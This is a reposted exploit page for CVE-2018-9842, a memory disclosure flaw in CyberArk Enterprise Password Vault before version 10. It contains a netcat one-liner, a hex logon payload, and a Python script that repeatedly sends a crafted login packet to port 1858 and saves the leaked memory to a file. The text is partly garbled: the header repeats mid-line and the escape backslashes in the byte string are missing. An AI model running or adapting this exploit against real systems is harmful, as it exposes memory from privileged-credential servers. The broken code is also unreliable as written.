CyberArk Memory Disclosure

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 282

# Exploit Title: CyberArk < 10 - Memory Disclosure
# Date: 2018-06-04
# Exploit Author: Thomas Zuk
# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-so # Exploit Title: CyberArk < 10 - Memory Disclosure
# Date: 2018-06-04
# Exploit Author: Thomas Zuk
# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Version: < 9.7 and < 10
# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10
# CVE: CVE-2018-9842

# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd
# paste the following bytes into a hexedited file named logon.bin:
#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000

#!/usr/bin/python

import socket
import os
import sys

ip = "10.107.32.21"
port = 1858

# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services.
# The below is a sample login request that is needed to receive the memory

pacli_logon = "xffxffxffxffxf7x00x00x00xffxffxffxffx3dx01x00x00x50x61x63x6cx69x53x63x72x69x70x74x55x73x65x72x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20x20x20x20xffxffxffxffx00x00x00x00x00x00x00x00x00x00x73x00x00x00xcexcexcexcex00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x30x3dx4cx6fx67x6fx6exfdx31x31x35x3dx37x2ex32x30x2ex39x30x2ex32x38xfdx36x39x3dx50xfdx31x31x36x3dx30xfdx31x30x30x3dxfdx32x31x37x3dx59xfdx32x31x38x3dx50x41x43x4cx49xfdx32x31x39x3dxfdx33x31x37x3dx30xfdx33x35x37x3dx30xfdx32x32x3dx50x61x63x6cx69x53x63x72x69x70x74x55x73x65x72xfdx33x36x37x3dx33x30xfdx00x00"

for iteration in range(0, 110):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(pacli_logon)

# recieve response
s.recv(200)
reply = s.recv(1500)

# write responses to file
file = open("cyberark_memory", "a")

file.write("received: ")
file.write(reply)
file.write(" ")
file.close()

s.close()